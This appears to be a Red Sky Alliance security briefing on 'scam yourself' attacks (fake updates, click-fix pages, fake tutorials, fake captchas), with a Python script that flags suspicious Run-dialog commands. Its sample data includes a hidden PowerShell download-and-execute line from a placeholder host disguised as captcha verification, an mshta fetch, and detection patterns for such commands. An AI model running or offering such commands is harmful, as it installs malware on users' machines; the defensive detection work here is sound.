Don’t Scam Yourself

Most people watch for online scams, but if you are not careful, you might do the scammers' work for them. A new study from Gen Digital, the company behind cybersecurity brands like Norton, Avast, LifeLock, AVG, ReputationDefender, and CCleaner, sheds some light on "scam yourself" attacks, which are rising dramatically. Instead of using other nefarious methods, these scams rely on social engineering to get people to download malware themselves.
Gen says millions of people have fallen for these scams, with a 614% increase in the third quarter of this year over the second quarter. Yes, 614%.

What is a "scam yourself" attack?

  • Fake updates – The next time your browser tells you it's time to update, take a second to ensure it's an actual notification. The phony update scam, in which a site tricks you into downloading software disguised as a necessary update, is on the rise. Only trust updates that appear directly from a settings menu instead of popups, and check the URL to verify the website.
  • Click fix – If you've ever Googled any computer issue, you've likely run across an authentic-looking webpage that promises a quick fix to your problem if you simply copy and paste a specific text into your command prompt. Unfortunately, you'll open your computer to attackers if you do that.
  • Fake tutorial – Thanks to community forums and sites like YouTube, remedying a tech problem has never been easier. Unfortunately, scammers know that many people online aren't savvy about tech problems, so they create fake tutorials. Instead of fixing an issue, these guides lead to malware. The tutorials usually include a "critical instruction" like "You'll need to turn off your antivirus for this to work," and then involve running a line of text through a command prompt. The result is that you have installed dangerous software on your system.
  • Fake Captcha – How often do you notice the little "I'm not a robot" prompts you see daily? Those are known as captchas, and scammers take advantage of people's casual attitudes toward them. With this scam, you click on what looks like an actual captcha. When you pass the initial verification, you're told to follow more instructions (like pressing the Windows key + R to open a command prompt and pasting a text string) that install malware on your computer. Norton says this scam targeted more than 2 million people globally in the past quarter.

"Scam-yourself attacks have become a cybercriminal's dream," Gen explains. "Users unknowingly follow instructions that do the attackers' bidding for them, whether through fake CAPTCHAs, misleading YouTube tutorials, or cleverly disguised README files."
What can you do to avoid these scams? Start by not relying on the fastest fix. Many of us have grown so accustomed to allowing updates and searching online for a quick answer that we often don't take the time to verify what we're seeing. But if you take a second to reconsider what you're looking at, scams are often obvious.
The study concludes that these fakes are not going anywhere, so it is important to recognize them before it is too late.
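For defenders who want to check whether someone has already followed a "click fix" or fake-captcha prompt, the sketch below scores commands entered in the Windows Run dialog for the traits those lures share. It is an added example, not code from Gen or Red Sky Alliance; the trait list, the threshold, and the sample entries are assumptions constructed for illustration.

```python
import re

# Traits of the one-liners that "click fix" and fake-captcha pages ask people
# to paste. The trait list and threshold are assumptions made for this example.
TRAITS = {
    "script_host": re.compile(
        r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|curl|certutil|bitsadmin)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "hidden_or_encoded": re.compile(
        r"(?<!\S)-(w|win|windowstyle)\s+h(idden)?\b"
        r"|(?<!\S)-(e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I),
    "run_downloaded": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "lure_text": re.compile(r"not a robot|captcha|verif(y|ication)|human", re.I),
    "av_tamper": re.compile(
        r"Set-MpPreference|Add-MpPreference|DisableRealtimeMonitoring", re.I),
}

# Constructed Run-dialog history entries (not real indicators). On Windows the
# real history is stored per user under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
SAMPLES = [
    "notepad",
    r"\\fileserver\share",
    'powershell -w hidden -c "iwr https://example.invalid/fix.ps1 | iex"'
    " # I am not a robot - verification ID 4821",
    "cmd /c ipconfig /flushdns",
    "mshta https://example.invalid/check.hta",
]


def triage(command, threshold=2):
    """Return the traits a command matches and whether it needs a closer look.

    A single trait (for example plain `cmd /c ...`) is normal admin activity;
    two or more together is what the pasted lure commands look like.
    """
    hits = sorted(name for name, rx in TRAITS.items() if rx.search(command))
    return {"command": command, "traits": hits, "suspicious": len(hits) >= threshold}


if __name__ == "__main__":
    for entry in SAMPLES:
        result = triage(entry)
        flag = "REVIEW" if result["suspicious"] else "ok    "
        print(f"{flag} {result['traits']} {entry[:60]}")
```

A match is a prompt for review, not proof of compromise; the trailing "I am not a robot" comment in the third sample is there only to make the pasted text look harmless in the Run box.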


This article is shared at no charge and is for educational and informational purposes only.

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC). For questions, comments, or assistance, please contact the office directly at 1-844-492-7225 or feedback@redskyalliance.com

• Reporting: https://www.redskyalliance.org/
• Website: https://www.redskyalliance.com/
• LinkedIn: https://www.linkedin.com/company/64265941

REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5378972949933166424
